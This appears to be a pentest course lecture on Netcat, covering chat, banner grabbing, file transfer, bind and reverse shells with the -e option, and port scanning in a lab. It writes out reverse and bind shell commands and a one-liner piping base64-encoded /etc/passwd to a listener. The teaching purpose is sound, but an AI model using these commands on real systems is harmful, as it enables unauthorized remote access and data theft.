Skip to content

Netcat

Introduction

The remote shells we have examined so far tend to be used for system admin purposes, and are unlikely to be the first part of any exploit (although if we can get user credentials, then connecting over a standard shell like SSH is incredibly useful).

In this article we look at Netcat, a tool for communicating over TCP/IP, that I have ended up using in almost every pentest or CTF I have been involved with.

What is Netcat?

Otherwise known as the 'Hackers' Swiss Army Knife', Netcat is a tool that allows us to create TCP based connections between various systems. Netcat can be used for almost any task that requires communication over a network including:

  • Connecting to a remote server
  • Transferring files
  • Port scanning
  • Banner grabbing
  • Talking to services, such as mail servers.
  • Browsing the web (this is awkward, but possible)

Netcat Versions

There are several versions of netcat available in Kali / Debian.

  • Netcat traditional. (nc)
  • BSD Netcat (nc)
  • Netcat (nc)
  • ncat (ncat)

While the core functionality is the same, there are some slight differences.

  • The standard netcat, and BSD netcat don't accept the -e parameter, so it doesn't support forwarding shells
  • Netcat traditional does support forwarding commands
  • ncat ncat supports forwarding, and also has features like encryption.

Personally, I prefer ncat, we get the same functionality, and I think the debugging output is clearer.

Important

Unless otherwise stated, we are going to use netcat / ncat interchangeably.

So the following commands are interchangeable.

# For netcat
$ nc

# For ncat
$ ncat 

Installing Netcat

Netcat should be installed by default on Kali. You can check this by running :

$ncat --version
Ncat: Version 7.70 ( https://nmap.org/ncat )

If you get a response you are good to go. Otherwise install it using the Advanced Package Tool (APT).

For windows you can get a copy from https://nmap.org/ncat/. I would also recommend grabbing a copy of the statically compiled version, and keeping it. Having it there, ready to transfer to a windows box is useful in a lot of pentesting situations.

Note

Recently, Windows defender has started flagging Netcat as a malicious service. While they have (a bit of) a point, it sucks that such a useful tool for general network admin get blocked.

The ones on the Nmap site seem to work, but VMMV

Using Netcat as a simple chat service

For our first example we will make use of Netcat as a simple chat service between our windows and Kali machines. We are going to do the following:

  • Set up a Netcat service listening on our windows machine (part 1)
  • Connect to this from our Kali VM (part 2)
  • Check it is working (part 3)

To set up Netcat to listen for incoming connections the command is:

$ nc -nvlp <port>

# or if using ncat

$ ncat -nvlp <port>

The flags are:

  • n -- No DNS lookup
  • v -- Verbose (give us loads of debugging info)
  • l -- Listen for incoming connections
  • p -- Port to listen on

To connect to a service using Netcat we can use $nc -nv <host> <port> The n and v flags mean the same as for the listener.

Part 1: Set up the listener

On Windows open a Command terminal (run -> cmd.exe)

C:\Users\Dan Goldsmith>ncat.exe -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Part 2: set up the client

On your Linux system start a terminal window and run:

$ncat -nv 192.168.227.128 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.128:4444.

Part 3: Check connectivity

On the Windows box we should get a message about a new connection:

C:\Users\Dan Goldsmith>ncat.exe -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.227.1.
Ncat: Connection from 192.168.227.1:40786.

And when we type anything into the terminal, it should also appear on the other machine.

Video

A quick Asciinema demo of the above. The "local" is the top window, "remote" the bottom

Easytask

Use Netcat to replicate the chat example above, between your host and any VM's

  • Connect from Windows to Linux
  • Connect from Linux to Windows

Another useful thing we can do with netcat is use it for Banner Grabbing.

Many services will output a greeting or other information when you connect to them, for example a FTP service may display the message of the day.

Note

We will go into more detail in the Active Recon lecture, but we may as well keep all the netcat examples in the same place.

As netcat is used to connect two TCP endpoints, we can also use it for grabbing text based banners.

For example, connecting to a FTP service using netcat gives the following output.

# -n No DNS Lookup  -v Verbose outut

$ ncat -nv 127.0.0.1 21
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:21.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 30 allowed.
220-Local time is now 22:09. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.

From this we can identify the FTP service in use (pureFTP)

File Transfer using Netcat

We can also use netcat for some basic file transfers. This can be handy if we want a quick and dirty way of moving data between machines, and things like python or scp are not available.

Note

We will also go into Exfiltration in more detail later on.

To do this we can make use of IO redirection and / or pipes. (Remember that both Windows and Linux support IO redirection and pipes)

First we need to setup a netcat listener that will send its output to a file

ncat -nvlp 4444 > theFile

We can then send the file from the remote machine in a similar way

ncat -nv 127.0.0.1 4444 < theFile

# Alterntively
cat theFile | ncat -nv 127.0.0.1 4444

While this works well for small text based files, it can give us a problem with things like binary / executable files. This is because we are trying to send binary data over protocols that are designed for text.

We can work around this problem by encoding the data using a protocol such as Base64

On the listener we run can convert the file using base64

ncat -nvlp 4444 > theFile.b64

#And Decode
base64 -d theFile.b64 > theFile

On the sender we need a two stage process

# Encode the file using Base64
base64 /etc/passwd > passwd.b64
ncat -nvlp 4444 < passwd.b64

Tip

We can also do it as a one liner at both ends

Listener

Sncat -nvlp 4444 | base64 -d > tmp.txt

Sender

$ base64 /etc/passwd | ncat -nv 127.0.0.1 4444

Task

We can use any function that can be piped here.

Spend some time and research how to:

  • Use Compression (like Tar / Zip)
  • Do the Base64 encoding on Windows systems.

Using Netcat to create a reverse shell

Netcat also lets us connect to other processes and send their data across the network. We can use this to get a basic reverse shell on a remote system.

Note

Not all versions of Netcat allow this; for example nc on Debian systems stops a shell being forwarded. But nc.traditional will allow it to work. If you are unlucky enough to have a version that will not forward the shell, you will have to find another way of creating the service on the target. However, you can still use Netcat on your machine to connect to any TCP based shell.

To do this we use the -e (execute) option, and pass it the command we want to run.

Remember this will be different depending on your target architecture:

  • If it's a windows box we can pass cmd.exe
  • For Linux systems /bin/sh is a good option

Let's demo setting up a simple Bind shell to connect to our windows machine from Linux.

Bind shell: Windows Target, Linux local machine.

We start a Netcat server as before, but this time connect it to a cmd.exe process.

C:\Users\Dan Goldsmith>ncat.exe -nvlp 4444 -e cmd.exe
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

On our Linux box we simply connect to the Netcat service as before. However, this time the command prompt is forwarded to us, and we can run shell commands.

$ncat -nv 192.168.227.128 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.128:4444.
Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Dan Goldsmith>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 62FE-ACF3

 Directory of C:\Users\Dan Goldsmith

04/16/2019  12:25 PM    <DIR>          .
04/16/2019  12:25 PM    <DIR>          ..
11/29/2018  12:53 PM    <DIR>          .idlerc
03/04/2019  04:25 PM    <DIR>          .local

------ 8<----- SNIP ------

Bind shell: Linux Target, Windows host

Let's swap this around, and see what happens when we setup a bind shell on our Linux box, and connect to it via windows.

On our Linux system we run almost the same command as before, but this time use /bin/sh as the process to connect to:

$ncat -nvlp 4444 -e /bin/sh 
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And on Windows we can connect back with:

C:\Users\Dan Goldsmith>ncat.exe -nv 192.168.227.1 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.1:4444.
whoami
dang

You will notice that the output from Linux systems loses formatting. This is due to the way the /bin/sh works; while it's ugly, we can still run most of the commands we would normally.

This is the same problem we had when running commands with SSH. The Linux shell expects to be running in a TTY, and we lose some functionality.

Tip

If you really can't stand the formatting, we can use python (if it is available) to give us a slightly nicer shell. Its not quite a fully featured shell, but it helps with some of the more irritating issues.

The Python PTY library, can be used to add some of the terminal like capabilities.

We can use the one-liner python -c "import pty; pty.spawn('/bin/bash')" to give us a Bash(like) shell.

Bind Shell: Video

This time we create a bind shell on the remote (bottom) of the screen. The remote opens a netcat listener and pipes its data to /bin/sh

We can then connect to this on the local machine (top), and execute some simple Linux commands.

Reverse Shells

Remember, with a reverse shell we get the target to connect and forward the shell to us. If we are taking this approach, we need to set things up in a different order, by getting the listener up and running first.

As an example, let's set up a remote shell from our Windows machine to the Linux box.

We first set up a listener on Linux:

$ncat -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

We then connect to this using Windows, with the -e option to forward a shell

C:\Users\Dan Goldsmith>ncat.exe -nv 192.168.227.1 4444 -e cmd.exe
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.1:4444.

We can see the connection coming into our Linux box, and the shell being forwarded:

$ncat -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.227.128.
Ncat: Connection from 192.168.227.128:50973.
Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Dan Goldsmith>

Reverse Shell Video

In this video we create a reverse shell

  • The local service (top) opens a netcat listener
  • The remote service connects to it and forwards a /bin/sh shell

Task

For the lab activities we will look at using Netcat for both Bind and Remote shells.

  • Create a bind shell listener on both windows and Linux then connect to it from the other machine
  • Create a listener on both Windows and Linux and connect to it.

Netcat for Recon

Tools like Nmap are a core part of our toolkit, essential for the recon process. However, they may not be available.

We can make use of Netcat as a "poor mans nmap" to give us an idea of what hosts are available on a network, or what ports are open.

Important

This is one Instance where the older nc is better than ncat The less verbose debugging output, makes things clearer

also ncat doesn't support port ranges by default

Netcat port scan

To use netcat as a basic port scanner we can use the use the -z flag. This tells netcat to report if it can connect to a remote service, and close the connection without sending any data.

To scan a single port we can use $ nc -zv <host> <port>:

For example to scan the open port 80. Notice we also get DNS resolution if we do not specify the -n flag.

$ nc -zv 127.0.0.1 80 
gogs.comsec [127.0.0.1] 80 (http) open

If the port is closed we get the following

$ nc -zv 127.0.0.1 81
gogs.comsec [127.0.0.1] 81: Connection refused

We can also scan a range of ports

$ nc -zv 127.0.0.1 1-1024
gogs.comsec [127.0.0.1] 21 (ftp) open
gogs.comsec [127.0.0.1] 25 (smtp) open
gogs.comsec [127.0.0.1] 80 (http) open
gogs.comsec [127.0.0.1] 242 (direct) open

We can also scan UDP ports with the same syntax and the -u flag.

In summary

Netcat is an incredibly versatile tool that I use when dealing with remote shells in most pentest / CTFs. In this article we have discussed how to use Netcat to create and connect to remote shells.

While we tend to use it for grabbing shells, netcat is also useful for other common tasks like banner grabbing, file transfer and as a basic port scanning tool.

Other Netcat #morenetcat

I have covered some of the more common ways we can use netcat Is there anything you think I have missed that should be added (for example port forwarding, firewall evasion)?

What's your favourite trick with netcat?

Discuss on the aula, or get ready to talk about it in the lab session